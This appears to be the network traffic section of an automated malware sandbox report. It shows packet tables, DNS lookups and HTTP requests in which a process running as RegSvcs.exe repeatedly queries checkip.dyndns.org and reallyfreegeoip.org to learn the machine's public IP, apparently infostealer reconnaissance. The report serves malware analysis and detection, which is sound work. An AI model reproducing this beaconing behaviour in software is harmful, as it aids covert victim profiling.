Nov 18, 2024 18:21:27.791966915 CET	80	49718	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:27.793292999 CET	49719	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:27.793340921 CET	443	49719	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:27.793401957 CET	49719	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:27.793648005 CET	49719	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:27.793661118 CET	443	49719	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:27.833162069 CET	49718	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:28.270560980 CET	49721	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:28.275566101 CET	80	49721	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:28.275660992 CET	49721	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:28.277118921 CET	49721	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:28.281991959 CET	80	49721	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:28.466228008 CET	443	49719	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:28.468067884 CET	49719	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:28.468087912 CET	443	49719	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:28.682250977 CET	443	49719	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:28.682337046 CET	443	49719	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:28.682533026 CET	49719	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:28.683074951 CET	49719	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:28.691873074 CET	49718	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:28.694185972 CET	49723	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:28.697511911 CET	80	49718	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:28.697581053 CET	49718	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:28.699167013 CET	80	49723	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:28.699246883 CET	49723	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:28.699466944 CET	49723	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:28.704351902 CET	80	49723	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:29.156857967 CET	80	49721	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:29.160865068 CET	49721	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:29.165864944 CET	80	49721	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:29.422700882 CET	80	49721	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:29.472580910 CET	49725	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:29.472618103 CET	443	49725	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:29.472681999 CET	49725	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:29.473738909 CET	49721	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:29.477653027 CET	49725	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:29.477663994 CET	443	49725	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:29.555248022 CET	80	49723	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:29.556740999 CET	49726	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:29.556776047 CET	443	49726	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:29.557622910 CET	49726	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:29.557939053 CET	49726	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:29.557952881 CET	443	49726	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:29.598750114 CET	49723	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:30.156235933 CET	443	49725	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:30.157210112 CET	49725	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:30.158301115 CET	49725	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:30.158308983 CET	443	49725	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:30.158590078 CET	443	49725	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:30.208302975 CET	49725	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:30.220602989 CET	49725	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:30.227149963 CET	443	49726	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:30.229074001 CET	49726	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:30.229096889 CET	443	49726	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:30.267327070 CET	443	49725	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:30.383363008 CET	443	49725	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:30.383433104 CET	443	49725	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:30.384303093 CET	49725	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:30.388300896 CET	49725	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:30.392301083 CET	49721	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:30.397296906 CET	80	49721	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:30.399981022 CET	443	49726	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:30.400054932 CET	443	49726	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:30.400111914 CET	49726	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:30.400515079 CET	49726	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:30.404299974 CET	49723	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:30.404690981 CET	49729	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:30.409821987 CET	80	49729	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:30.409904957 CET	49729	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:30.410033941 CET	80	49723	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:30.410052061 CET	49729	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:30.410094976 CET	49723	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:30.415307045 CET	80	49729	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:30.663184881 CET	80	49721	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:30.665832996 CET	49731	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:30.665869951 CET	443	49731	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:30.665940046 CET	49731	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:30.666434050 CET	49731	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:30.666443110 CET	443	49731	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:30.724303961 CET	49721	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:31.299364090 CET	80	49729	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:31.300730944 CET	49732	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:31.300776958 CET	443	49732	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:31.300976992 CET	49732	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:31.301228046 CET	49732	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:31.301239014 CET	443	49732	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:31.311697006 CET	443	49731	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:31.314138889 CET	49731	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:31.314166069 CET	443	49731	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:31.348747015 CET	49729	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:31.488071918 CET	443	49731	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:31.488136053 CET	443	49731	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:31.488218069 CET	49731	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:31.492690086 CET	49731	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:31.497279882 CET	49721	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:31.499336958 CET	49733	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:31.504189968 CET	80	49721	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:31.504290104 CET	49721	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:31.504626989 CET	80	49733	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:31.505584955 CET	49733	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:31.505584955 CET	49733	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:31.511950016 CET	80	49733	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:31.950767040 CET	443	49732	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:31.959449053 CET	49732	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:31.959542036 CET	443	49732	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:32.219407082 CET	443	49732	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:32.219475985 CET	443	49732	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:32.219671965 CET	49732	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:32.220033884 CET	49732	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:32.223931074 CET	49729	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:32.225169897 CET	49735	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:32.232112885 CET	80	49735	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:32.232309103 CET	49735	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:32.232359886 CET	49735	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:32.237225056 CET	80	49735	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:32.256247044 CET	80	49729	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:32.256330013 CET	49729	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:32.474581957 CET	80	49733	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:32.478502035 CET	49741	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:32.478538036 CET	443	49741	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:32.478647947 CET	49741	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:32.479281902 CET	49741	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:32.479295015 CET	443	49741	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:32.520607948 CET	49733	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:33.369868040 CET	80	49735	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:33.370282888 CET	443	49741	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:33.371192932 CET	49742	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:33.371228933 CET	443	49742	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:33.371678114 CET	49742	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:33.371964931 CET	49742	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:33.371977091 CET	443	49742	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:33.392932892 CET	49741	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:33.392955065 CET	443	49741	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:33.395868063 CET	80	49735	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:33.396095991 CET	49735	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:33.557853937 CET	443	49741	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:33.557934999 CET	443	49741	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:33.558109999 CET	49741	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:33.558351994 CET	49741	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:33.561700106 CET	49733	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:33.562697887 CET	49748	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:33.566968918 CET	80	49733	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:33.567107916 CET	49733	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:33.567617893 CET	80	49748	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:33.567696095 CET	49748	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:33.567935944 CET	49748	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:33.573061943 CET	80	49748	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:34.020216942 CET	443	49742	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:34.030354023 CET	49742	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:34.030374050 CET	443	49742	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:34.212155104 CET	443	49742	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:34.212213039 CET	443	49742	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:34.212260962 CET	49742	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:34.213078976 CET	49742	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:34.471199989 CET	80	49748	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:34.472553968 CET	49754	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:34.472626925 CET	443	49754	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:34.472708941 CET	49754	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:34.472956896 CET	49754	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:34.472990990 CET	443	49754	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:34.520631075 CET	49748	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:35.118999958 CET	443	49754	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:35.128405094 CET	49754	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:35.128432989 CET	443	49754	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:35.290707111 CET	443	49754	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:35.290775061 CET	443	49754	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:35.290904999 CET	49754	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:35.291481972 CET	49754	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:35.296385050 CET	49757	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:35.301819086 CET	80	49757	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:35.301935911 CET	49757	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:35.302304983 CET	49757	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:35.307286024 CET	80	49757	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:36.199075937 CET	80	49757	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:36.200470924 CET	49762	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:36.200520039 CET	443	49762	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:36.200997114 CET	49762	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:36.200997114 CET	49762	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:36.201030016 CET	443	49762	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:36.239375114 CET	49757	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:36.856218100 CET	443	49762	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:36.858289003 CET	49762	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:36.858325005 CET	443	49762	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:37.020653009 CET	443	49762	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:37.020715952 CET	443	49762	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:37.020796061 CET	49762	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:37.030206919 CET	49762	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:37.049647093 CET	49757	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:37.055305958 CET	80	49757	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:37.055479050 CET	49757	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:37.056179047 CET	49767	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:37.061031103 CET	80	49767	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:37.063261986 CET	49767	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:37.063261986 CET	49767	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:37.068308115 CET	80	49767	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:37.943816900 CET	80	49767	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:37.945132971 CET	49773	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:37.945219994 CET	443	49773	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:37.945337057 CET	49773	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:37.945547104 CET	49773	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:37.945581913 CET	443	49773	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:37.989815950 CET	49767	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:38.614718914 CET	443	49773	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:38.616844893 CET	49773	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:38.616878033 CET	443	49773	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:38.783349991 CET	443	49773	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:38.783427000 CET	443	49773	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:38.783482075 CET	49773	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:38.784009933 CET	49773	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:38.787957907 CET	49767	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:38.788541079 CET	49778	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:38.794178009 CET	80	49767	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:38.794275999 CET	49767	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:38.794466019 CET	80	49778	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:38.794528008 CET	49778	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:38.794673920 CET	49778	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:38.799478054 CET	80	49778	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:39.673593998 CET	80	49778	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:39.676309109 CET	49784	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:39.676353931 CET	443	49784	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:39.676441908 CET	49784	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:39.679092884 CET	49784	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:39.679104090 CET	443	49784	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:39.723773003 CET	49778	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:40.321948051 CET	443	49784	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:40.323695898 CET	49784	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:40.323709011 CET	443	49784	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:40.477658987 CET	443	49784	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:40.477727890 CET	443	49784	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:40.477859974 CET	49784	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:40.478409052 CET	49784	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:40.481758118 CET	49778	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:40.483112097 CET	49790	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:40.487108946 CET	80	49778	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:40.487196922 CET	49778	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:40.487947941 CET	80	49790	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:40.488070965 CET	49790	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:40.488154888 CET	49790	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:40.492969990 CET	80	49790	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:41.345062971 CET	80	49790	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:41.349895000 CET	49796	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:41.349937916 CET	443	49796	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:41.350172997 CET	49796	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:41.350485086 CET	49796	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:41.350495100 CET	443	49796	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:41.395664930 CET	49790	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:42.002938986 CET	443	49796	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:42.004520893 CET	49796	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:42.004553080 CET	443	49796	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:42.416960001 CET	443	49796	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:42.417033911 CET	443	49796	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:42.417160034 CET	49796	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:42.417649984 CET	49796	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:22:29.044264078 CET	80	49714	132.226.247.73	192.168.2.5
Nov 18, 2024 18:22:29.044409990 CET	49714	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:22:38.287586927 CET	80	49735	132.226.247.73	192.168.2.5
Nov 18, 2024 18:22:38.287651062 CET	49735	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:22:39.625020981 CET	80	49748	132.226.247.73	192.168.2.5
Nov 18, 2024 18:22:39.628469944 CET	49748	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:22:46.481296062 CET	80	49790	132.226.247.73	192.168.2.5
Nov 18, 2024 18:22:46.481532097 CET	49790	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:23:13.380198002 CET	49735	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:23:13.385503054 CET	80	49735	132.226.247.73	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 18:21:19.507865906 CET	61600	53	192.168.2.5	1.1.1.1
Nov 18, 2024 18:21:19.516755104 CET	53	61600	1.1.1.1	192.168.2.5
Nov 18, 2024 18:21:20.782370090 CET	57941	53	192.168.2.5	1.1.1.1
Nov 18, 2024 18:21:20.790808916 CET	53	57941	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 18, 2024 18:21:19.507865906 CET	192.168.2.5	1.1.1.1	0x12c4	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:21:20.782370090 CET	192.168.2.5	1.1.1.1	0xda45	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 18, 2024 18:21:19.516755104 CET	1.1.1.1	192.168.2.5	0x12c4	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 18, 2024 18:21:19.516755104 CET	1.1.1.1	192.168.2.5	0x12c4	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:21:19.516755104 CET	1.1.1.1	192.168.2.5	0x12c4	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:21:19.516755104 CET	1.1.1.1	192.168.2.5	0x12c4	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:21:19.516755104 CET	1.1.1.1	192.168.2.5	0x12c4	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:21:19.516755104 CET	1.1.1.1	192.168.2.5	0x12c4	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:21:20.790808916 CET	1.1.1.1	192.168.2.5	0xda45	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:21:20.790808916 CET	1.1.1.1	192.168.2.5	0xda45	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49711	132.226.247.73	80	7364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:21:19.552418947 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:21:20.416034937 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8fcc52fa805ff6e79e807727e79c4c93 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:21:20.446110010 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 18:21:20.713268042 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d93b2dd062b55ba241dae4e9fd107c8d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:21:20.927921057 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:21:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d93b2dd062b55ba241dae4e9fd107c8d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:21:21.931711912 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
